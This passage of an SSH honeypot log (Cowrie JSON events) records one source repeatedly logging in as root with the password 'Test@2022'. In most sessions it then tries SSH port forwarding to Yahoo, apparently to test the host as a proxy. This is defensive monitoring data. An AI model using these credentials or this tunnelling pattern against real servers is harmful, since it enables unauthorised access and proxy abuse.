-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.199878Z","src_ip":"213.209.150.239","session":"68af63f46de3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.434432Z","src_ip":"213.209.150.239","session":"68af63f46de3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":12331,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12331","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.483030Z","session":"68af63f46de3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.530363Z","src_ip":"213.209.150.239","session":"68af63f46de3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":22695,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:22695","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.665499Z","session":"68af63f46de3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.712616Z","src_ip":"213.209.150.239","session":"68af63f46de3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.760762Z","src_ip":"213.209.150.239","session":"68af63f46de3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32379,"dst_ip":"1.2.3.4","dst_port":22,"session":"d35c99ea82d6","protocol":"ssh","message":"New connection: 213.209.150.239:32379 (1.2.3.4:22) [session: d35c99ea82d6]","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.807053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.808162Z","src_ip":"213.209.150.239","session":"d35c99ea82d6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:37.855279Z","src_ip":"213.209.150.239","session":"d35c99ea82d6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:38.090473Z","src_ip":"213.209.150.239","session":"d35c99ea82d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":29181,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:29181","sensor":"my-vps","timestamp":"2025-08-26T01:04:38.138983Z","session":"d35c99ea82d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:38.186309Z","src_ip":"213.209.150.239","session":"d35c99ea82d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":22327,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22327","sensor":"my-vps","timestamp":"2025-08-26T01:04:38.321513Z","session":"d35c99ea82d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:38.368735Z","src_ip":"213.209.150.239","session":"d35c99ea82d6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:38.417168Z","src_ip":"213.209.150.239","session":"d35c99ea82d6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32427,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c0a4fba6fa9","protocol":"ssh","message":"New connection: 213.209.150.239:32427 (1.2.3.4:22) [session: 0c0a4fba6fa9]","sensor":"my-vps","timestamp":"2025-08-26T01:04:38.473009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:38.473939Z","src_ip":"213.209.150.239","session":"0c0a4fba6fa9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:38.531327Z","src_ip":"213.209.150.239","session":"0c0a4fba6fa9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:38.813625Z","src_ip":"213.209.150.239","session":"0c0a4fba6fa9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":16811,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:16811","sensor":"my-vps","timestamp":"2025-08-26T01:04:38.871305Z","session":"0c0a4fba6fa9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:38.928160Z","src_ip":"213.209.150.239","session":"0c0a4fba6fa9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":2800,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:2800","sensor":"my-vps","timestamp":"2025-08-26T01:04:39.083055Z","session":"0c0a4fba6fa9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:39.139737Z","src_ip":"213.209.150.239","session":"0c0a4fba6fa9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:39.196932Z","src_ip":"213.209.150.239","session":"0c0a4fba6fa9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32497,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5a1819c2687","protocol":"ssh","message":"New connection: 213.209.150.239:32497 (1.2.3.4:22) [session: a5a1819c2687]","sensor":"my-vps","timestamp":"2025-08-26T01:04:39.252813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:39.253744Z","src_ip":"213.209.150.239","session":"a5a1819c2687"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:39.310540Z","src_ip":"213.209.150.239","session":"a5a1819c2687"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:39.592957Z","src_ip":"213.209.150.239","session":"a5a1819c2687"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":31620,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:31620","sensor":"my-vps","timestamp":"2025-08-26T01:04:39.650601Z","session":"a5a1819c2687"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:39.707344Z","src_ip":"213.209.150.239","session":"a5a1819c2687"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":29613,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:29613","sensor":"my-vps","timestamp":"2025-08-26T01:04:39.863200Z","session":"a5a1819c2687"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:39.920104Z","src_ip":"213.209.150.239","session":"a5a1819c2687"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:39.978264Z","src_ip":"213.209.150.239","session":"a5a1819c2687"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32546,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f9be0f782b7","protocol":"ssh","message":"New connection: 213.209.150.239:32546 (1.2.3.4:22) [session: 3f9be0f782b7]","sensor":"my-vps","timestamp":"2025-08-26T01:04:40.024622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:40.025279Z","src_ip":"213.209.150.239","session":"3f9be0f782b7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:40.072737Z","src_ip":"213.209.150.239","session":"3f9be0f782b7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:40.307216Z","src_ip":"213.209.150.239","session":"3f9be0f782b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":26716,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:26716","sensor":"my-vps","timestamp":"2025-08-26T01:04:40.355376Z","session":"3f9be0f782b7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:40.402536Z","src_ip":"213.209.150.239","session":"3f9be0f782b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":15380,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:15380","sensor":"my-vps","timestamp":"2025-08-26T01:04:40.537493Z","session":"3f9be0f782b7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:40.584621Z","src_ip":"213.209.150.239","session":"3f9be0f782b7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:40.632428Z","src_ip":"213.209.150.239","session":"3f9be0f782b7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32595,"dst_ip":"1.2.3.4","dst_port":22,"session":"690fd2040372","protocol":"ssh","message":"New connection: 213.209.150.239:32595 (1.2.3.4:22) [session: 690fd2040372]","sensor":"my-vps","timestamp":"2025-08-26T01:04:40.688267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:40.689259Z","src_ip":"213.209.150.239","session":"690fd2040372"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:40.745785Z","src_ip":"213.209.150.239","session":"690fd2040372"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.028415Z","src_ip":"213.209.150.239","session":"690fd2040372"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":31782,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:31782","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.086571Z","session":"690fd2040372"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.143320Z","src_ip":"213.209.150.239","session":"690fd2040372"}
